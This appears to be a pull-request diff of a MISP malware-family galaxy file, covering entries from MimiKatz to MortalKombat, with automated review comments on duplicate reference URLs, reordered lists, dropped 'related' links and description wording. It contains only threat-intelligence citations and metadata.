+ "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
+ "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-ransomexx",
+ "https://medium.com/cycraft/taiwan-high-tech-ecosystem-targeted-by-foreign-apt-group-5473d2ad8730",
+ "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbasta",
+ "https://www.fireeye.com/blog/threat-research/2021/08/unc215-chinese-espionage-campaign-in-israel.html",
+ "https://www.ic3.gov/media/news/2020/200917-1.pdf",
+ "https://www.sentinelone.com/blog/detecting-a-rogue-domain-controller-dcshadow-attack/",
+ "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage",
+ "https://twitter.com/inversecos/status/1456486725664993287",
+ "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/locked-loaded-and-in-the-wrong-hands-legitimate-tools-weaponized-for-ransomware-in-2021",
+ "https://hub.dragos.com/hubfs/116-Whitepapers/Dragos_Intel_WP_InitAccess-IndEnvirons-Final.pdf",
+ "https://www.elastic.co/security-labs/cuba-ransomware-campaign-analysis",
+ "https://blog.talosintelligence.com/2020/02/building-bypass-with-msbuild.html",
+ "https://www.ic3.gov/Media/News/2021/210527.pdf",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/grayfly-china-sidewalk-malware",
+ "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
+ "https://www.theta.co.nz/news-blogs/cyber-security-blog/snakes-ladders-the-offensive-use-of-python-on-windows/",
+ "https://attack.mitre.org/groups/G0011",
+ "https://www.matteomalvica.com/blog/2020/01/30/mimikatz-lsass-dump-windg-pykd/",
+ "https://asec.ahnlab.com/ko/39682/",
+ "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-152A_Karakurt_Data_Extortion_Group.pdf",
+ "https://attack.mitre.org/groups/G0034",
+ "https://bitdefender.com/files/News/CaseStudies/study/332/Bitdefender-Whitepaper-Chafer-creat4491-en-EN-interactive.pdf",
+ "https://www.intrinsec.com/apt27-analysis/",
+ "https://www.verfassungsschutz.de/download/broschuere-2021-01-bfv-cyber-brief-2021-01.pdf",
+ "https://www.verfassungsschutz.de/embed/broschuere-2020-06-bfv-cyber-brief-2020-01.pdf",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments",
+ "https://noticeofpleadings.com/nickel/#",
+ "https://yoroi.company/research/shadows-from-the-past-threaten-italian-enterprises/",
+ "https://www.varonis.com/blog/hive-ransomware-analysis",
+ "https://www.infinitumit.com.tr/en/conti-ransomware-group-behind-the-karakurt-hacking-team/",
+ "https://github.com/gentilkiwi/mimikatz",
+ "https://securelist.com/the-sessionmanager-iis-backdoor/106868/",
+ "https://volatility-labs.blogspot.com/2021/10/memory-forensics-r-illustrated.html",
+ "https://www.wired.com/story/chinese-hackers-taiwan-semiconductor-industry-skeleton-key/",
+ "https://www.breachquest.com/conti-leaks-insight-into-a-ransomware-unicorn/",
+ "https://attack.mitre.org/groups/G0096",
+ "https://lab52.io/blog/the-energy-reserves-in-the-eastern-mediterranean-sea-and-a-malicious-campaign-of-apt10-against-turkey/",
+ "http://www.secureworks.com/research/threat-profiles/gold-burlap",
+ "https://unit42.paloaltonetworks.com/atoms/obscureserpens/",
+ "https://news.sophos.com/en-us/2022/08/18/cookie-stealing-the-new-perimeter-bypass",
+ "https://www.devo.com/blog/detect-and-investigate-hafnium-using-devo/",
+ "https://www.secureworks.com/research/bronze-vinewood-targets-supply-chains",
+ "https://www.secureworks.com/research/threat-profiles/tin-woodlawn",
+ "https://www.secureworks.com/research/threat-profiles/gold-kingswood",
+ "https://www.accenture.com/us-en/blogs/cyber-defense/moving-left-ransomware-boom",
+ "https://www.hvs-consulting.de/lazarus-report/",
+ "http://blog.gentilkiwi.com/securite/un-observateur-evenements-aveugle",
+ "http://www.secureworks.com/research/threat-profiles/gold-franklin",
+ "https://www.secureworks.com/research/threat-profiles/gold-drake",
+ "https://blog.reversinglabs.com/blog/threat-analysis-follina-exploit-powers-live-off-the-land-attacks",
+ "https://news.sophos.com/en-us/2021/05/18/the-active-adversary-playbook-2021/?cmp=37153",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/china-apt-antlion-taiwan-financial-attacks",
+ "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout",
+ "https://www.secureworks.com/research/threat-profiles/bronze-atlas",
+ "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations.pdf",
+ "https://decoded.avast.io/luigicamastra/apt-group-planted-backdoors-targeting-high-profile-networks-in-central-asia",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/",
+ "https://www.microsoft.com/security/blog/2021/12/06/nickel-targeting-government-organizations-across-latin-america-and-europe/",
+ "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-campaign-telecoms-asia-middle-east",
+ "https://www.secureworks.com/blog/ransomware-deployed-by-adversary",
+ "https://www.secureworks.com/blog/ongoing-campaign-leveraging-exchange-vulnerability-potentially-linked-to-iran",
+ "https://www.kroll.com/en/insights/publications/cyber/black-basta-technical-analysis",
+ "https://www.rsa.com/content/dam/en/white-paper/the-shadows-of-ghosts-carbanak-report.pdf",
+ "https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks",
+ "https://blog.redteam.pl/2020/05/sodinokibi-revil-ransomware.html",
+ "https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Cyber-Sicherheit/Vorfaelle/Exchange-Schwachstellen-2021/MSExchange_Schwachstelle_Detektion_Reaktion.pdf",
+ "https://www.splunk.com/en_us/blog/security/you-bet-your-lsass-hunting-lsass-access.html",
+ "https://us-cert.cisa.gov/ncas/alerts/aa20-275a",
+ "https://www.mandiant.com/resources/unc215-chinese-espionage-campaign-in-israel",
+ "https://www.secureworks.com/research/samsam-ransomware-campaigns",
+ "https://assets.virustotal.com/reports/2021trends.pdf",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/witchetty-steganography-espionage",
+ "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions",
+ "https://i.blackhat.com/USA-20/Thursday/us-20-Chen-Operation-Chimera-APT-Operation-Targets-Semiconductor-Vendors.pdf",
+ "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=5758557d-6e3a-4174-90f3-fa92a712ecd9&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments",
+ "https://thedfirreport.com/2020/08/31/netwalker-ransomware-in-1-hour/",
+ "https://www.slideshare.net/yurikamuraki5/active-directory-240348605",
+ "https://www.trendmicro.com/en_us/research/21/i/examining-the-cring-ransomware-techniques.html",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/microsoft-exchange-server-protection",
+ "https://www.hvs-consulting.de/media/downloads/ThreatReport-Lazarus.pdf",
+ "https://ics-cert.kaspersky.com/media/KASPERSKY_Steganography_in_targeted_attacks_EN.pdf",
+ "https://www.f-secure.com/content/dam/f-secure/en/consulting/our-thinking/collaterals/digital/f-secure-consulting-incident-readiness-proactive-response-guide-2020.pdf",
+ "https://paraflare.com/attack-lifecycle-detection-of-an-operational-technology-breach/",
+ "https://www.microsoft.com/security/blog/2021/11/18/iranian-targeting-of-it-sector-on-the-rise/",
+ "https://www.trendmicro.com/en_us/research/21/a/targeted-attack-using-chopper-aspx-web-shell-exposed-via-managed.html",
+ "https://awakesecurity.com/blog/catching-the-white-stork-in-flight/",
+ "https://5851803.fs1.hubspotusercontent-na1.net/hubfs/5851803/Russian%20Ransomware%20C2%20Network%20Discovered%20in%20Censys%20Data.pdf",
+ "https://www.mandiant.com/resources/mandiant-red-team-emulates-fin11-tactics",
+ "https://labs.f-secure.com/blog/catching-lazarus-threat-intelligence-to-real-detection-logic-part-two",
+ "https://www.secureworks.com/research/threat-profiles/bronze-vinewood",
+ "https://www.accenture.com/us-en/blogs/cyber-defense/double-extortion-campaigns",
+ "https://twitter.com/swisscom_csirt/status/1354052879158571008",
+ "https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers",
+ "https://unit42.paloaltonetworks.com/trigona-ransomware-update/",
+ "https://www.accenture.com/us-en/blogs/security/ransomware-hades",
+ "https://blogs.blackberry.com/en/2022/09/the-curious-case-of-monti-ransomware-a-real-world-doppelganger",
+ "https://raw.githubusercontent.com/yt0ng/cracking_softcell/main/Cracking_SOFTCLL_TLP_WHITE.pdf",
+ "https://www.crowdstrike.com/blog/credential-theft-mimikatz-techniques/",
+ "https://www.welivesecurity.com/2022/09/06/worok-big-picture/"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "7f3a035d-d83a-45b8-8111-412aa8ade802",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "588fb91d-59c6-4667-b299-94676d48b17b",
"value": "MimiKatz"
},
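Review bot: the regenerated MimiKatz reference list contains near-duplicate entries that differ only in scheme, and the `related` link is dropped without replacement. `http://www.secureworks.com/research/threat-profiles/gold-kingswood` and `https://www.secureworks.com/research/threat-profiles/gold-kingswood` both appear, as do the http and https forms of `.../threat-profiles/gold-drake`; the FireEye and Mandiant URLs for the UNC215 report point at the same article. Deduplicating by normalised URL (scheme stripped, trailing `#` removed) before emitting the list would keep the cluster cleaner. Separately, the removed `related` block tying this cluster to dest-uuid `7f3a035d-d83a-45b8-8111-412aa8ade802` with type `similar` is not re-added anywhere in the hunk; if the relation is meant to survive, it needs to be preserved by the generator, otherwise the PR description should state that cross-cluster links are intentionally dropped. Note also that every visible removed ref reappears in the added block, so this hunk is a wholesale rewrite of the list rather than a set of additions, which makes the actual change (new Mimikatz sources plus the mim221 and Mimic Ransomware entries) hard to review.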
@@ -32126,12 +33886,12 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.minebridge",
- "https://blog.morphisec.com/minebridge-on-the-rise-sophisticated-delivery-mechanism",
+ "https://www.bleepingcomputer.com/news/security/windows-finger-command-abused-by-phishing-to-download-malware/",
"https://www.zscaler.com/blogs/security-research/return-minebridge-rat-new-ttps-and-social-engineering-lures",
"https://www.fireeye.com/blog/threat-research/2020/01/stomp-2-dis-brilliance-in-the-visual-basics.html",
- "https://www.zscaler.com/blogs/security-research/demystifying-full-attack-chain-minebridge-rat",
+ "https://blog.morphisec.com/minebridge-on-the-rise-sophisticated-delivery-mechanism",
"https://labs.sentinelone.com/breaking-ta505s-crypter-with-an-smt-solver/",
- "https://www.bleepingcomputer.com/news/security/windows-finger-command-abused-by-phishing-to-download-malware/"
+ "https://www.zscaler.com/blogs/security-research/demystifying-full-attack-chain-minebridge-rat"
],
"synonyms": [
"GazGolder"
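Review bot: this hunk only permutes the four existing MineBridge refs; no URL is added or removed. Emitting refs in a stable order (for example sorted, or in the order the upstream source lists them) would avoid this kind of churn in generated diffs and make real reference changes stand out.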
@@ -32151,31 +33911,23 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "ea9c7068-1c28-4826-a7d1-7ac04760e5c9",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "a4f8bacf-2076-4e00-863c-874cdd833a41",
"value": "MiniASP"
},
{
- "description": "",
+ "description": "The MiniDuke toolset consists of multiple downloader and backdoor components",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.miniduke",
+ "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
+ "https://cybergeeks.tech/how-to-defeat-the-russian-dukes-a-step-by-step-analysis-of-miniduke-used-by-apt29-cozy-bear/",
"https://www.carbonblack.com/2020/03/26/the-dukes-of-moscow/",
"https://www.circl.lu/files/tr-14/circl-analysisreport-miniduke-stage3-public.pdf",
- "https://www.secureworks.com/research/threat-profiles/iron-hemlock",
"https://kindredsec.wordpress.com/2019/08/12/an-overview-of-public-platform-c2s/",
+ "https://research.checkpoint.com/2022/native-function-and-assembly-code-invocation/",
"https://www.fireeye.com/blog/threat-research/2013/02/its-a-kind-of-magic-1.html",
- "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
"https://kindredsec.com/2019/08/12/an-overview-of-public-platform-c2s/",
- "https://cybergeeks.tech/how-to-defeat-the-russian-dukes-a-step-by-step-analysis-of-miniduke-used-by-apt29-cozy-bear/"
+ "https://www.secureworks.com/research/threat-profiles/iron-hemlock"
],
"synonyms": [],
"type": []
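Review bot: the new MiniDuke description `"The MiniDuke toolset consists of multiple downloader and backdoor components"` is missing its terminating period, unlike the other descriptions in this file. In the same hunk the MiniASP `related` block pointing at dest-uuid `ea9c7068-1c28-4826-a7d1-7ac04760e5c9` is removed without a replacement; confirm this is intended rather than a side effect of the regeneration.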
@@ -32196,6 +33948,19 @@
"uuid": "01e605b0-aadc-40a3-986f-f0795fd20401",
"value": "MiniStealer"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mintstealer",
+ "https://twitter.com/ViriBack/status/1610393842787704835"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "15c036d3-e1d8-4e4a-850c-20ce65bdd24c",
+ "value": "MintStealer"
+ },
{
"description": "",
"meta": {
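Review bot: the new MintStealer entry ships with an empty `description`, and its only non-Malpedia ref is a single tweet. A one-line description would make the cluster findable by keyword search in MISP; if Malpedia provides one for `win.mintstealer`, the generator should pick it up.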
@@ -32203,8 +33968,8 @@
"https://malpedia.caad.fkie.fraunhofer.de/details/win.mirage",
"https://st.drweb.com/static/new-www/news/2020/july/Study_of_the_APT_attacks_on_state_institutions_in_Kazakhstan_and_Kyrgyzstan_en.pdf",
"https://www.intezer.com/miragefox-apt15-resurfaces-with-new-tools-based-on-old-ones/",
- "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf",
- "https://www.secureworks.com/research/threat-profiles/bronze-palace"
+ "https://www.secureworks.com/research/threat-profiles/bronze-palace",
+ "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf"
],
"synonyms": [],
"type": []
@@ -32230,16 +33995,16 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.mirai",
- "https://securelist.com/blog/research/77621/newish-mirai-spreader-poses-new-risks/",
- "https://unit42.paloaltonetworks.com/moobot-d-link-devices/",
- "https://dev.azure.com/Mastadamus/Mirai%20Botnet%20Analysis/_wiki/wikis/Mirai-Botnet-Analysis.wiki/12/Anatomy-of-An-Mirai-Botnet-Attack",
- "https://blog.netlab.360.com/wo-men-kan-dao-de-wu-ke-lan-bei-ddosgong-ji-xi-jie/",
- "https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf",
"https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/tough-times-for-ukrainian-honeypot/",
- "https://assets.virustotal.com/reports/2021trends.pdf",
- "https://www.incapsula.com/blog/new-mirai-variant-ddos-us-college.html",
+ "https://unit42.paloaltonetworks.com/moobot-d-link-devices/",
+ "https://securelist.com/blog/research/77621/newish-mirai-spreader-poses-new-risks/",
+ "https://dev.azure.com/Mastadamus/Mirai%20Botnet%20Analysis/_wiki/wikis/Mirai-Botnet-Analysis.wiki/12/Anatomy-of-An-Mirai-Botnet-Attack",
+ "https://twitter.com/PhysicalDrive0/status/830070569202749440",
"https://blog.netlab.360.com/public-cloud-threat-intelligence-202203/",
- "https://twitter.com/PhysicalDrive0/status/830070569202749440"
+ "https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf",
+ "https://blog.netlab.360.com/wo-men-kan-dao-de-wu-ke-lan-bei-ddosgong-ji-xi-jie/",
+ "https://www.incapsula.com/blog/new-mirai-variant-ddos-us-college.html",
+ "https://assets.virustotal.com/reports/2021trends.pdf"
],
"synonyms": [],
"type": []
@@ -32252,11 +34017,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.mirrorblast",
- "https://blog.morphisec.com/explosive-new-mirrorblast-campaign-targets-financial-companies",
"https://www.proofpoint.com/us/blog/threat-insight/whatta-ta-ta505-ramps-activity-delivers-new-flawedgrace-variant",
"https://www.proofpoint.com/us/daily-ruleset-update-summary-20210924",
- "https://threatresearch.ext.hp.com/mirrorblast-and-ta505-examining-similarities-in-tactics-techniques-and-procedures/",
- "https://frsecure.com/blog/the-rebol-yell-new-rebol-exploit/"
+ "https://blog.morphisec.com/explosive-new-mirrorblast-campaign-targets-financial-companies",
+ "https://frsecure.com/blog/the-rebol-yell-new-rebol-exploit/",
+ "https://threatresearch.ext.hp.com/mirrorblast-and-ta505-examining-similarities-in-tactics-techniques-and-procedures/"
],
"synonyms": [],
"type": []
@@ -32264,6 +34029,19 @@
"uuid": "be347289-5ca5-4b49-b5ef-8443883736c1",
"value": "MirrorBlast"
},
+ {
+ "description": "According to Trend Micro, this is a loader for win.transbox, used by threat actor Earth Yako.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mirrorkey",
+ "https://www.trendmicro.com/en_us/research/23/b/invitation-to-secret-event-uncovering-earth-yako-campaigns.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "7340174e-3ff7-4293-acd0-1a82433a7777",
+ "value": "MirrorKey"
+ },
{
"description": "",
"meta": {
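Review bot: the MirrorKey description refers to its payload by the Malpedia identifier `win.transbox` rather than a cluster or malware name, which reads oddly in the MISP UI. Consider rewording to the family name and, if a corresponding TransBox cluster exists in this galaxy, expressing the loader relationship through a `related` entry instead of only in prose.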
@@ -32297,6 +34075,7 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.misha",
+ "https://blog.bushidotoken.net/2022/11/detecting-and-fingerprinting.html",
"https://bazaar.abuse.ch/sample/efab8bfe43de6edf96f9451a5a2cc15017cfc5c88f81b46b33e6ba5c7e2d7a7b/"
],
"synonyms": [],
@@ -32310,10 +34089,12 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.mispadu",
+ "https://blog.scilabs.mx/en/cyber-threat-profile-malteiro/",
"https://www.welivesecurity.com/2019/11/19/mispadu-advertisement-discounted-unhappy-meal/",
"https://seguranca-informatica.pt/threat-analysis-the-emergent-ursa-trojan-impacts-many-countries-using-a-sophisticated-loader/",
- "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/mispadu-banking-trojan-resurfaces",
- "https://seguranca-informatica.pt/ursa-trojan-is-back-with-a-new-dance/#.YyXEkaRBzIU"
+ "https://seguranca-informatica.pt/ursa-trojan-is-back-with-a-new-dance/#.YyXEkaRBzIU",
+ "https://blog.scilabs.mx/cyber-threat-profile-malteiro/",
+ "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/mispadu-banking-trojan-resurfaces"
],
"synonyms": [
"URSA"
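Review bot: the Mispadu refs now contain two URLs for the same Scilabs post, `https://blog.scilabs.mx/en/cyber-threat-profile-malteiro/` and `https://blog.scilabs.mx/cyber-threat-profile-malteiro/` (English and default-language paths). Keeping one of them, or deduplicating on path suffix in the generator, would avoid the duplicate.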
@@ -32323,6 +34104,20 @@
"uuid": "ffc9ffcc-24f4-4e60-ab02-a75b007359fa",
"value": "Mispadu"
},
+ {
+ "description": "Mandiant associates this with UNC4191, this malware decrypts and runs DARKDEW.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mistcloak",
+ "https://www.mandiant.com/resources/blog/china-nexus-espionage-southeast-asia",
+ "https://news.sophos.com/en-us/2022/11/03/family-tree-dll-sideloading-cases-may-be-related/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "1e6bc052-73de-453d-ba6c-658c82fe21d4",
+ "value": "MISTCLOAK"
+ },
{
"description": "",
"meta": {
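Review bot: the MISTCLOAK description is a comma splice: `"Mandiant associates this with UNC4191, this malware decrypts and runs DARKDEW."` Suggest `"Mandiant associates this with UNC4191; the malware decrypts and runs DARKDEW."` If a DARKDEW cluster exists in the galaxy, the decrypts-and-runs relationship could also be recorded as a `related` entry.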
@@ -32373,15 +34168,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "74bd8c09-73d5-4ad8-ab1f-e94a4853c936",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "6363cc2f-08f1-47a0-adbf-5cf19ea89ffd",
"value": "MM Core"
},
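Review bot: the `related` array on MM Core linking to dest-uuid `74bd8c09-73d5-4ad8-ab1f-e94a4853c936` (type `similar`, likelihood almost-certain) is removed with nothing taking its place. Please confirm the drop is deliberate; if the regenerator simply does not know about `related`, it should carry existing relations over.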
@@ -32411,7 +34197,7 @@
"value": "Mocton"
},
{
- "description": "",
+ "description": "According to PCrisk, ModernLoader, also known as Avatar Bot and AvatarLoader, is a malicious program that has minimalistic loader and RAT (Remote Access Trojan) functionalities.\r\n\r\nLoader-type malware is designed to infect devices with additional malicious programs, while RATs enable remote access/control over infected machines. ModernLoader is capable of executing basic commands and injecting malicious modules into systems.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.modern_loader",
@@ -32443,9 +34229,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.modpipe",
- "https://www.welivesecurity.com/2020/11/12/hungry-data-modpipe-backdoor-hits-pos-software-hospitality-sector/",
"https://www.foregenix.com/blog/modpipe-malware-has-a-new-module-that-siphons-payment-card-data",
- "https://www.kroll.com/en/insights/publications/cyber/modpipe-pos-malware-new-hooking-targets-extract-card-data"
+ "https://www.kroll.com/en/insights/publications/cyber/modpipe-pos-malware-new-hooking-targets-extract-card-data",
+ "https://www.welivesecurity.com/2020/11/12/hungry-data-modpipe-backdoor-hits-pos-software-hospitality-sector/"
],
"synonyms": [],
"type": []
@@ -32500,10 +34286,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.moker",
- "https://breakingmalware.com/malware/moker-part-2-capabilities/",
- "https://blog.malwarebytes.com/threat-analysis/2017/04/elusive-moker-trojan/",
+ "http://blog.ensilo.com/moker-a-new-apt-discovered-within-a-sensitive-network",
"https://breakingmalware.com/malware/moker-part-1-dissecting-a-new-apt-under-the-microscope/",
- "http://blog.ensilo.com/moker-a-new-apt-discovered-within-a-sensitive-network"
+ "https://breakingmalware.com/malware/moker-part-2-capabilities/",
+ "https://blog.malwarebytes.com/threat-analysis/2017/04/elusive-moker-trojan/"
],
"synonyms": [],
"type": []
@@ -32530,8 +34316,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.mole",
- "https://www.cert.pl/en/news/single/mole-ransomware-analysis-and-decryptor/",
- "https://www.proofpoint.com/us/threat-insight/post/adgholas-malvertising-campaign-using-astrum-ek-deliver-mole-ransomware"
+ "https://www.proofpoint.com/us/threat-insight/post/adgholas-malvertising-campaign-using-astrum-ek-deliver-mole-ransomware",
+ "https://www.cert.pl/en/news/single/mole-ransomware-analysis-and-decryptor/"
],
"synonyms": [],
"type": []
@@ -32557,11 +34343,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.molerat_loader",
- "https://www.cybereason.com/hubfs/dam/collateral/reports/Molerats-in-the-Cloud-New-Malware-Arsenal-Abuses-Cloud-Platforms-in-Middle-East-Espionage-Campaign.pdf",
- "http://www.clearskysec.com/iec/",
"https://www.0ffset.net/reverse-engineering/malware-analysis/molerats-string-decryption/",
+ "https://www.cybereason.com/hubfs/dam/collateral/reports/Molerats-in-the-Cloud-New-Malware-Arsenal-Abuses-Cloud-Platforms-in-Middle-East-Espionage-Campaign.pdf",
"https://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/",
- "https://www.proofpoint.com/us/blog/threat-insight/new-ta402-molerats-malware-targets-governments-middle-east"
+ "https://www.proofpoint.com/us/blog/threat-insight/new-ta402-molerats-malware-targets-governments-middle-east",
+ "http://www.clearskysec.com/iec/"
],
"synonyms": [],
"type": []
@@ -32574,9 +34360,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.monero_miner",
- "https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer/",
"https://news.sophos.com/en-us/2021/10/24/node-poisoning-hijacked-package-delivers-coin-miner-and-credential-stealing-backdoor",
- "https://www.welivesecurity.com/2017/09/28/monero-money-mining-malware/"
+ "https://www.welivesecurity.com/2017/09/28/monero-money-mining-malware/",
+ "https://cybersecurity.att.com/blogs/labs-research/shikitega-new-stealthy-malware-targeting-linux",
+ "https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer/",
+ "https://asec.ahnlab.com/en/37526/"
],
"synonyms": [
"CoinMiner"
@@ -32586,6 +34374,19 @@
"uuid": "c57a4168-cd09-4611-a665-bbcede80f42b",
"value": "Monero Miner"
},
+ {
+ "description": "A new ransomware gang hitting companies in worldwide firstly spotted by Zscaler.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.moneymessage",
+ "https://yoroi.company/research/money-ransomware-the-latest-double-extortion-group/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "07dff193-2fad-4de6-83ad-046c6b95be46",
+ "value": "Money Message"
+ },
{
"description": "",
"meta": {
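Review bot: the Money Message description attributes the first sighting to Zscaler, but the only source listed besides Malpedia is the Yoroi write-up, so the claim is not backed by a ref in this entry. Either add the Zscaler source or drop the attribution. The sentence also needs a grammar pass: `"A new ransomware gang hitting companies in worldwide firstly spotted by Zscaler."` should read something like `"A ransomware group targeting companies worldwide, first reported by Zscaler."`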
@@ -32596,15 +34397,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "aa3aa21f-bc4e-4fb6-acd2-f4b6de482dfe",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "e0627961-fc28-4b7d-bb44-f937defa052a",
"value": "mongall"
},
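Review bot: the mongall `related` block (dest-uuid `aa3aa21f-bc4e-4fb6-acd2-f4b6de482dfe`, type `similar`) is deleted and not re-added in this hunk. Confirm this is intentional; otherwise the generator should preserve existing relations when it rewrites an entry.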
@@ -32628,8 +34420,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.moonbounce",
- "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/01/19115831/MoonBounce_technical-details_eng.pdf",
"https://securelist.com/moonbounce-the-dark-side-of-uefi-firmware/105468/",
+ "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/01/19115831/MoonBounce_technical-details_eng.pdf",
"https://www.binarly.io/posts/A_deeper_UEFI_dive_into_MoonBounce/index.html",
"https://habr.com/ru/amp/post/668154/"
],
@@ -32649,15 +34441,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "76ec1827-68a1-488f-9899-2b788ea8db64",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "8465177f-16c8-47fc-a4c8-f4c0409fe460",
"value": "MoonWind"
},
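Review bot: MoonWind loses its `related` link to dest-uuid `76ec1827-68a1-488f-9899-2b788ea8db64` in this hunk without replacement. Same question as for the other dropped relations: intended, or a regeneration artifact?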
@@ -32666,12 +34449,12 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.moriagent",
- "https://twitter.com/Timele9527/status/1272776776335233024",
"https://www.cisa.gov/uscert/ncas/alerts/aa22-055a",
- "https://securelist.com/apt-trends-report-q3-2020/99204/",
"https://www.inforisktoday.com/muddywater-targets-critical-infrastructure-in-asia-europe-a-18611",
- "https://live.paloaltonetworks.com/t5/custom-signatures/how-to-stop-mortiagent-malware-using-the-snort-rule/td-p/326590#",
"https://www.cisa.gov/uscert/sites/default/files/publications/AA22-055A_Iranian_Government-Sponsored_Actors_Conduct_Cyber_Operations.pdf",
+ "https://live.paloaltonetworks.com/t5/custom-signatures/how-to-stop-mortiagent-malware-using-the-snort-rule/td-p/326590#",
+ "https://securelist.com/apt-trends-report-q3-2020/99204/",
+ "https://twitter.com/Timele9527/status/1272776776335233024",
"https://www.cybercom.mil/Media/News/Article/2897570/iranian-intel-cyber-suite-of-malware-uses-open-source-tools/"
],
"synonyms": [],
@@ -32705,13 +34488,26 @@
"uuid": "9de41613-7762-4a88-8e9a-4e621a127f32",
"value": "Morphine"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mortalkombat",
+ "https://blog.talosintelligence.com/new-mortalkombat-ransomware-and-laplas-clipper-malware-threats/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "ff3b11e4-3450-4db5-a2ed-5c45cd875330",
+ "value": "MortalKombat"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.morto",
- "https://www.f-secure.com/weblog/archives/00002227.html",
